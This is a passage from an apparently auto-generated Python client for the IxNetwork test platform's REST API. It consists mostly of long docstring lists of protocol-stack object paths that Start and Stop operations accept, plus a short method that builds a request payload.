ack/atm/pppoxEndpoint,/vport/protocolStack/atm/pppoxEndpoint/ancp,/vport/protocolStack/atm/pppoxEndpoint/range,/vport/protocolStack/atm/pppoxEndpoint/range/ancpRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet,/vport/protocolStack/ethernet/dcbxEndpoint,/vport/protocolStack/ethernet/dcbxEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint,/vport/protocolStack/ethernet/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/dhcpEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/dhcpServerEndpoint,/vport/protocolStack/ethernet/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip,/vport/protocolStack/ethernet/emulatedRouter/ip/ancp,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ip/twampServer,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/ethernet/emulatedRouterEndpoint,/vport/protocolStack/ethernet/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/ethernet/esmc,/vport/protocolStack/ethernet/fcoeClientEndpoint,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFdiscRange,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFlogiRange,/vport/protocolStack/ethernet/fcoeFwdEndpoint,/vport/protocolStack/ethernet/fcoeFwdEndpoint/range,/vport/protocolStack/ethernet/fcoeFwdEndpoint/secondaryRange,/vport/protocolStack/ethernet/ip,/vport/protocolStack/ethernet/ip/ancp,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ip/twampServer,/vport/protocolStack/ethernet/ipEndpoint,/vport/protocolStack/ethernet/ipEndpoint/ancp,/vport/protocolStack/ethernet/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ipEndpoint/twampServer,/vport/protocolStack/ethernet/pppox,/vport/protocolStack/ethernet/pppox/ancp,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppoxEndpoint,/vport/protocolStack/ethernet/pppoxEndpoint/ancp,/vport/protocolStack/ethernet/pppoxEndpoint/range,/vport/protocolStack/ethernet/pppoxEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/vepaEndpoint,/vport/protocolStack/ethernet/vepaEndpoint/range,/vport/protocolStack/ethernetEndpoint,/vport/protocolStack/ethernetEndpoint/esmc,/vport/protocolStack/fcClientEndpoint,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range/fcClientFdiscRange,/vport/protocolStack/fcClientEndpoint/range/fcClientFlogiRange,/vport/protocolStack/fcFportFwdEndpoint,/vport/protocolStack/fcFportFwdEndpoint/range,/vport/protocolStack/fcFportFwdEndpoint/secondaryRange]
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the stop operation on the server.
Teardown sessions for all protocols on all ranges belonging to selected plugins
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(async_operation=bool)
--------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(Arg2=enum, async_operation=bool)
-------------------------------------
- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm,/vport/protocolStack/atm/dhcpEndpoint,/vport/protocolStack/atm/dhcpEndpoint/ancp,/vport/protocolStack/atm/dhcpEndpoint/range,/vport/protocolStack/atm/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/dhcpServerEndpoint,/vport/protocolStack/atm/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip,/vport/protocolStack/atm/emulatedRouter/ip/ancp,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ip/twampServer,/vport/protocolStack/atm/emulatedRouter/ipEndpoint,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/atm/emulatedRouterEndpoint,/vport/protocolStack/atm/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/atm/ip,/vport/protocolStack/atm/ip/ancp,/vport/protocolStack/atm/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint,/vport/protocolStack/atm/ip/l2tpEndpoint/range,/vport/protocolStack/atm/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint,/vport/protocolStack/atm/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ip/twampServer,/vport/protocolStack/atm/ipEndpoint,/vport/protocolStack/atm/ipEndpoint/ancp,/vport/protocolStack/atm/ipEndpoint/range/amtRange,/vport/protocolStack/atm/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/atm/ipEndpoint/twampServer,/vport/protocolStack/atm/pppox,/vport/protocolStack/atm/pppox/ancp,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppoxEndpoint,/vport/protocolStack/atm/pppoxEndpoint/ancp,/vport/protocolStack/atm/pppoxEndpoint/range,/vport/protocolStack/atm/pppoxEndpoint/range/ancpRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet,/vport/protocolStack/ethernet/dcbxEndpoint,/vport/protocolStack/ethernet/dcbxEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint,/vport/protocolStack/ethernet/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/dhcpEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/dhcpServerEndpoint,/vport/protocolStack/ethernet/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip,/vport/protocolStack/ethernet/emulatedRouter/ip/ancp,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolSta